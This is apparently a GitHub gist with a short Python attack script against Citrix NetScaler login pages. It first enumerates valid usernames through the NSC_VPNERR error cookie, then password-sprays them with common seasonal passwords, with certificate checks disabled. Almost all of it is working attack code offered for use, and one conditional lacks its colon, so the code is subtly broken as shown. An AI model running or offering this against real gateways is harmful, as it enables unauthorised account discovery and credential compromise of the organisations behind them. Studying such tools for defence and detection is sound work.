Created
March 27, 2018 16:04
-
-
Save averagesecurityguy/072bcce8b6a656921632c8b8aaee429d to your computer and use it in GitHub Desktop.
Citrix NetScaler Enumeration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests | |
| requests.packages.urllib3.disable_warnings() | |
| passwords = ['Spring2018', 'Password1'] | |
| url = 'https://<server_ip>/p/u/doAuthentication.do' | |
| users = [] | |
| with open('usernames.txt') as f: | |
| for line in f: | |
| line = line.rstrip('\r\n') | |
| users.append(line) | |
| # Enumerate users. For more details about the error codes, review this: | |
| # https://www.citrix.com/blogs/2014/06/11/enhanced-authentication-feedback/ | |
| for user in users: | |
| data = { | |
| 'login': user, | |
| 'passwd': 'Mostlikelynotarealpassword.', | |
| 'savecredentials': False, | |
| 'sg-xl-logon-button': 'Log On', | |
| 'StateContext': '' # Get this from page. | |
| } | |
| resp = requests.post(url, data=data, verify=False) | |
| val = resp.cookies.get("NSC_VPNERR") | |
| if val == '4007' | |
| print(user) | |
| # Bruteforce users. Look for oddities in the content size and the status code. | |
| # This will indicate a likely successful credential pair. | |
| for user in users: | |
| for pwd in passwords: | |
| data = { | |
| 'login': user, | |
| 'passwd': pwd, | |
| 'savecredentials': False, | |
| 'sg-xl-logon-button': 'Log On', | |
| 'StateContext': '' # Get this from page. | |
| } | |
| resp = requests.post(url, data=data, verify=False) | |
| print("{0}:{1} - {2}\t{3}".format(user, pwd, resp.status_code, len(resp.content))) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment